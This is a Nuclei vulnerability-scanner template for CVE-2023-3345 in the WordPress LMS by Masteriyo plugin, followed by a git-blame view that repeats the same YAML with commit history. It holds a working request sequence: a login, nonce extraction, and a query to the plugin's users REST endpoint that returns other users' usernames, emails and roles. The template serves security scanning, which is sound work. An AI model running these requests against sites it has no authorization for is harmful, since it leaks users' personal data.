nuclei-templates/http/cves/2023/CVE-2023-3345.yaml

id: CVE-2023-3345

info:
  name: LMS by Masteriyo < 1.6.8 - Information Exposure
  author: DhiyaneshDK
  severity: medium
  description: |
    The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.
  remediation: |
    Upgrade LMS by Masteriyo to version 1.6.8 or higher to fix the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/0d07423e-98d2-43a3-824d-562747a3d65a
    - https://github.com/RandomRobbieBF/learning-management-system
    - https://wordpress.org/plugins/learning-management-system
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3345
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-3345
    cwe-id: CWE-200
    epss-score: 0.00441
    epss-percentile: 0.72071
    cpe: cpe:2.3:a:masteriyo:masteriyo:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: masteriyo
    product: masteriyo
    framework: wordpress
  tags: wp-plugin,xss,wp,wordpress,exposure,authenticated,learning-management-system,wpscan

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/profile.php HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-json/masteriyo/v1/users/ HTTP/1.1
        Host: {{Hostname}}
        X-WP-Nonce: {{nonce}}

    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '"username":'
          - '"email":'
          - '"roles":'
        condition: and

      - type: word
        part: header_3
        words:
          - application/json

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - '"nonce":"([a-z0-9]+)","versionString'
        internal: true
# digest: 4a0a0047304502206a52aed827140a35f5808edd93ae69610bff29f8f7fe6f9683d93db446118989022100ea1dc45c128a3341c0796f7ff9b89606a645c1993e106e483a7d0e7e7cbdce63:922c64590222798bb761d5b6d8e72950
Create CVE-2023-3345.yaml 2023-07-15 12:32:13 +00:00			`id: CVE-2023-3345`

			`info:`
			`name: LMS by Masteriyo < 1.6.8 - Information Exposure`
			`author: DhiyaneshDK`
			`severity: medium`
			`description: \|`
			`The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints.`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`remediation: \|`
			`Upgrade LMS by Masteriyo to version 1.6.8 or higher to fix the vulnerability.`
Create CVE-2023-3345.yaml 2023-07-15 12:32:13 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/0d07423e-98d2-43a3-824d-562747a3d65a`
			`- https://github.com/RandomRobbieBF/learning-management-system`
			`- https://wordpress.org/plugins/learning-management-system`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-3345`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 6.5`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`cve-id: CVE-2023-3345`
			`cwe-id: CWE-200`
templateman update 2023-10-14 11:27:55 +00:00			`epss-score: 0.00441`
TemplateMan Update [Sun Nov 5 22:23:39 UTC 2023] :robot: 2023-11-05 22:23:39 +00:00			`epss-percentile: 0.72071`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`cpe: cpe:2.3:a:masteriyo:masteriyo::::::wordpress::*`
TemplateMan Update [Tue Jul 18 06:02:36 UTC 2023] :robot: 2023-07-18 06:02:36 +00:00			`metadata:`
			`verified: true`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`max-request: 3`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`vendor: masteriyo`
			`product: masteriyo`
updated remediation in 2023 CVEs 2023-09-06 11:43:37 +00:00			`framework: wordpress`
Update CVE-2023-3345.yaml 2023-07-15 16:33:45 +00:00			`tags: wp-plugin,xss,wp,wordpress,exposure,authenticated,learning-management-system,wpscan`
Create CVE-2023-3345.yaml 2023-07-15 12:32:13 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /wp-login.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Origin: {{RootURL}}`
			`Content-Type: application/x-www-form-urlencoded`

			`log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1`
			`- \|`
			`GET /wp-admin/profile.php HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`GET /wp-json/masteriyo/v1/users/ HTTP/1.1`
			`Host: {{Hostname}}`
			`X-WP-Nonce: {{nonce}}`

			`cookie-reuse: true`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00
Create CVE-2023-3345.yaml 2023-07-15 12:32:13 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body_3`
			`words:`
			`- '"username":'`
			`- '"email":'`
			`- '"roles":'`
			`condition: and`

			`- type: word`
			`part: header_3`
			`words:`
			`- application/json`

			`- type: status`
			`status:`
			`- 200`

			`extractors:`
			`- type: regex`
			`name: nonce`
			`part: body`
			`group: 1`
			`regex:`
			`- '"nonce":"([a-z0-9]+)","versionString'`
			`internal: true`
Auto Template Signing [Mon Nov 6 06:48:30 UTC 2023] :robot: 2023-11-06 06:48:30 +00:00			`# digest: 4a0a0047304502206a52aed827140a35f5808edd93ae69610bff29f8f7fe6f9683d93db446118989022100ea1dc45c128a3341c0796f7ff9b89606a645c1993e106e483a7d0e7e7cbdce63:922c64590222798bb761d5b6d8e72950`